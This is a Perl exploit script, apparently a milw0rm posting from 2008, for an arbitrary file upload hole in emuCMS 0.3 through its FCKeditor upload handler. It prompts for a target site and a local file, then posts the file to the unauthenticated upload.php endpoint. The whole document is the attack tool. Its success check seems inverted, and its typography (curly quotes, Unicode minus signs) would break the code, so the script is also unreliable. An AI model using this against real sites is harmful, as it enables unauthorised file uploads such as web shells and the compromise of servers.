1 #!/usr/bin/perl
2 use strict;
3 use warnings;
4 use LWP::UserAgent;
5 use HTTP::Request::Common;
6 print <<INTRO;
7 +++++++++++++++++++++++++++++++++++++++++++++++++++++
8 +emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +
9 + +
10 + By: Stack +
11 +++++++++++++++++++++++++++++++++++++++++++++++++++++
12 # t0pP8uZz
13 INTRO
14 print "Enter URL(ie: http://site.com): ";
15 chomp(my $url=<STDIN>);
16
17 print "Enter File Path(path to local file to upload): ";
18 chomp(my $file=<STDIN>);
19 my $ua = LWP::UserAgent−>new;
20 my $re = $ua−>request(POST $url.’/admin/FCKeditor/editor/filemanager/upload/php/upload.php’,
21 Content_Type => ’form−data’,
22 Content => [ NewFile => $file ] );
23 if($re−>is_success) {
24 if( index($re−>content, "Disabled") != −1 ) { print "Exploit Successfull! File Uploaded!\n"; }
25 else { print "File Upload Is Disabled! Failed!\n"; }
26 } else { print "HTTP Request Failed!\n"; }
27 exit;
28
29 # milw0rm.com [2008−06−23]
Page 1/1
emuCMS 0.3 fckeditor Arbitrary File Upload Exploit
Stack
06/23/2008